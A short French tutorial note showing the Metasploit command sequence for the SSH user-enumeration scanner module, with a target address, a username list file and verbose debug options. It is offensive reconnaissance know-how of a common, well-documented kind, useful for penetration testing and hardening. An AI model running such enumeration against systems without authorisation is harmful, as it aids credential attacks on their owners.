l'application d'un exploit metasploit (ici en exemple l'enumération ssh des utilisateur) se décompose généralement ansi :

use auxiliary/scanner/ssh/ssh_enumusers
show options
set RHOSTS 192.168.9.2
set USER_FILE userfile
exploit

Dans notre exemple, nous auront créé un fichier "./userfile" qui listera les utilisateurs à tester (parfois aux vue des logs de mes bastions, je pense que certains hackers utilisent cela, ahahah)

quelques options sont dites avancées :

show advanced
set verbose true
set SSH_DEBUG true